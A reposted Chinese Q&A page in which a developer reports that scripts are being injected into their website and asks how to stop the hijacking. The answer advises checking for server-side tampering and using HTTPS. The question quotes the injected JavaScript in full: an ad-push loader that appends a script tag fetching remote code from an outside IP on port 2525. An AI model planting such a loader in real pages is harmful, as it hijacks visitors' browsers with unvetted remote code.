javascript - 网站被注入脚本,如何解决劫持
本文介绍了javascript - 网站被注入脚本,如何解决劫持的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着小编来一起学习吧!
问题描述
问 题
1.自己开发的网站被注入脚本,有时候这个脚本注入成功就不影响网站访问,注入失败,网站直接就访问不了。
2.注入失败的脚本
3.脚本代码
var _pushshowjs_ = new Object;
_pushshowjs_.expires = 10;
_pushshowjs_.param = '102398|80|80|10|1|1|';
_pushshowjs_.url = 'http://gg.zhiong.net:2525/adauto/ads/1499756747237/index.htm?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPys3PyczOy7/OyczRmJuDzs3O0czL0crRxoPOg87Pzc7Hx4POz83MxseDxsbGxoOIiIjRhpCKjYyZjNGckJKDzsrPz8nNzMnJy4PNg83Pz8+Dz4POzcz=';
_pushshowjs_.adtype = '1';
_pushshowjs_.feedurl = 'http://mat.zhiong.net:2525/feedback/dataprocess/receivedata.do';
_pushshowjs_.eparam = '?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPys3PyczOy7/OyczRmJuDzs3O0czL0crRxoPOg87Pzc7Hx4POz83MxseDxsbGxoOIiIjRhpCKjYyZjNGckJKDzsrPz8nNzMnJy4PNg83Pz8+Dz4POzcz=';
_pushshowjs_.realinfo = '';
_pushshowjs_.closeispush = '0';
_pushshowjs_.isAutoClose = '0';
_pushshowjs_.closeTimes = '15';
window.setTimeout(function() {
var a = document.createElement("script");
a.type = 'text/javascript';
a.src = 'http://125.89.69.5:2525/pushjs/embed_mobile_V1.js';
a.src += a.src.indexOf('?') == -1 ? '?' : '&';
a.src += 't=' + (new Date().getTime());
if (_pushshowjs_.adtype != '4') {
document.getElementsByTagName("head")[0].appendChild(a);
} else {
document.getElementsByTagName("body")[0].appendChild(a);
a = document.createElement("script");
a.type = 'text/javascript';
a.src = 'http://125.89.69.5:2525/pushjs/embed_mobile_V1.js';
document.getElementsByTagName("body")[0].appendChild(a);
}
}, 0);
有什么办法可以解决这个劫持问题?
解决方案
先确认是源服务器上文件被篡改了,还是在传输过程中被篡改的:
如果是源被篡改了,改回去,然后看看服务器是不是有什么漏洞导致被入侵;
如果是传输过程中被篡改了,就比较麻烦。如果有条件的话,使用HTTPS
这篇关于javascript - 网站被注入脚本,如何解决劫持的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
查看全文
